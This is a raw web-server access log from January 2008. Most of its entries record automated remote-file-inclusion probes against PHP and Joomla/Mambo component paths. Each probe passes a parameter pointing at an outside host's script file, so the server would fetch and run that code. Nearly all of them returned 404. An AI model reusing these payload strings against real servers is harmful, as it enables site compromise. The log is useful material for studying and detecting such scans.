209.62.26.18 - - [14/Jan/2008:12:18:44 -0800] "GET /logs/access_070702.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:18:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:18:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:18:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:18:50 -0800] "GET /logs/access_071112.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:18:50 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.7.201.206 - - [14/Jan/2008:12:19:10 -0800] "GET /logs/access_071105.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.206 - - [14/Jan/2008:12:19:10 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.201.206 - - [14/Jan/2008:12:19:10 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:19:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:19:54 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:20:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:20:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.24 - - [14/Jan/2008:12:20:56 -0800] "GET /logs/access_071231.log//eva/index.php3?perso=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.24 - - [14/Jan/2008:12:20:56 -0800] "GET //eva/index.php3?perso=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.24 - - [14/Jan/2008:12:20:58 -0800] "GET /logs//eva/index.php3?perso=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:21:49 -0800] "GET /logs/access_071217.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:21:54 -0800] "GET /logs/access_070625.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.57.128.49 - - [14/Jan/2008:12:22:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.128.49 - - [14/Jan/2008:12:22:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.128.49 - - [14/Jan/2008:12:22:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.128.49 - - [14/Jan/2008:12:22:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:23:02 -0800] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:23:02 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:23:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.37.240 - - [14/Jan/2008:12:23:23 -0800] "GET /logs/access_071029.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.37.240 - - [14/Jan/2008:12:23:23 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.37.240 - - [14/Jan/2008:12:23:23 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.19.148 - - [14/Jan/2008:12:23:50 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:23:58 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:24:42 -0800] "GET /logs/access_071001.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:24:42 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:24:42 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:24:51 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:24:51 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:25:04 -0800] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:25:04 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:25:04 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.52.216.28 - - [14/Jan/2008:12:25:29 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.216.28 - - [14/Jan/2008:12:25:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.193.50 - - [14/Jan/2008:12:25:42 -0800] "GET /naboard_pnr.php?skin=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
70.84.193.50 - - [14/Jan/2008:12:25:42 -0800] "GET /logs/naboard_pnr.php?skin=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:25:56 -0800] "GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:26:20 -0800] "GET /logs//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:12:27:00 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:12:27:01 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:12:27:01 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:27:14 -0800] "GET /logs/access_070625.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.52.216.28 - - [14/Jan/2008:12:27:18 -0800] "GET /logs/access_071029.log//skin/zero_vote/error.php?dir=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:27:30 -0800] "GET /logs/access_071231.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:27:42 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:27:43 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:27:43 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
151.1.141.17 - - [14/Jan/2008:12:27:44 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:28:42 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:28:43 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:28:43 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:28:47 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:28:47 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:28:48 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:28:55 -0800] "GET /logs/access_071022.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.183.20 - - [14/Jan/2008:12:29:28 -0800] "GET /logs/access_071015.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://miltube.com/classifieds/adpics/4775a92114654d7aac6f08ac4.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.65.100.5 - - [14/Jan/2008:12:30:29 -0800] "GET /naboard_pnr.php?skin=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
217.65.100.5 - - [14/Jan/2008:12:30:29 -0800] "GET /logs/naboard_pnr.php?skin=http://www.donagro.ru/files/images/search4.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:30:35 -0800] "GET /logs/access_070625.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [14/Jan/2008:12:30:35 -0800] "GET /logs/access_070625.log//tools/send_reminders.php?noSet=0&includedir=http://www.telefuglehund.org/__gjestebok/hdguestbook/data/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:12:31:42 -0800] "GET /logs/access_071112.log/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:12:31:42 -0800] "GET /index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.133.111.29 - - [14/Jan/2008:12:31:42 -0800] "GET /logs/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:33:02 -0800] "GET /logs/access_071119.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:33:05 -0800] "GET /logs/access_071119.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:33:38 -0800] "GET /home.php?pagina=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
207.44.188.10 - - [14/Jan/2008:12:33:38 -0800] "GET /logs/home.php?pagina=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
80.249.117.99 - - [14/Jan/2008:12:34:45 -0800] "GET /logs/access_071231.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:34:56 -0800] "GET /logs/////////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:34:56 -0800] "GET /logs/////////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:34:56 -0800] "GET /////////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.252.231 - - [14/Jan/2008:12:34:56 -0800] "GET /////////administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.189.4.131 - - [14/Jan/2008:12:35:04 -0800] "GET /logs/access_071029.log/1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.189.4.131 - - [14/Jan/2008:12:35:04 -0800] "GET /1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.189.4.131 - - [14/Jan/2008:12:35:05 -0800] "GET /logs/1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.113.226.82 - - [14/Jan/2008:12:35:40 -0800] "GET /logs/access_071217.log/middle.php?file=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:35:43 -0800] "GET /logs/access.log/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:35:43 -0800] "GET /index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.103.130.64 - - [14/Jan/2008:12:35:44 -0800] "GET /logs/index.php?u=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:36:21 -0800] "GET /logs/access_071112.log//_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:36:21 -0800] "GET //_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:36:21 -0800] "GET /logs//_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
205.234.132.157 - - [14/Jan/2008:12:36:32 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
205.234.132.157 - - [14/Jan/2008:12:36:32 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.fieldhockey.be/site/login? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
64.34.201.90 - - [14/Jan/2008:12:36:38 -0800] "GET /logs/access_071210.log//_theme/breadcrumb.php?rootBase=http://claroline.lct-net.cl/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.249.84.11 - - [14/Jan/2008:12:37:23 -0800] "GET / HTTP/1.1" 200 1048 "http://www.google.com/search?q=lesbianas&hl=es&lr=&client=firefox-a&channel=s&rls=org.mozilla:es-ES:official&start=40&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.galf.org"
208.186.169.183 - - [14/Jan/2008:12:38:11 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:38:53 -0800] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:38:53 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.90.179.94 - - [14/Jan/2008:12:38:53 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.6.26.203 - - [14/Jan/2008:12:39:10 -0800] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.189.4.131 - - [14/Jan/2008:12:39:12 -0800] "GET /logs/access_071217.log/1000http://kk31.site.voila.fr/p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:40:03 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
202.176.218.45 - - [14/Jan/2008:12:40:04 -0800] "GET / HTTP/1.1" 200 1048 "-" "FAST Enterprise Crawler 6 used by Singapore Press Holdings (crawler@sphsearch.sg)" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:40:28 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.16.224.119 - - [14/Jan/2008:12:40:29 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
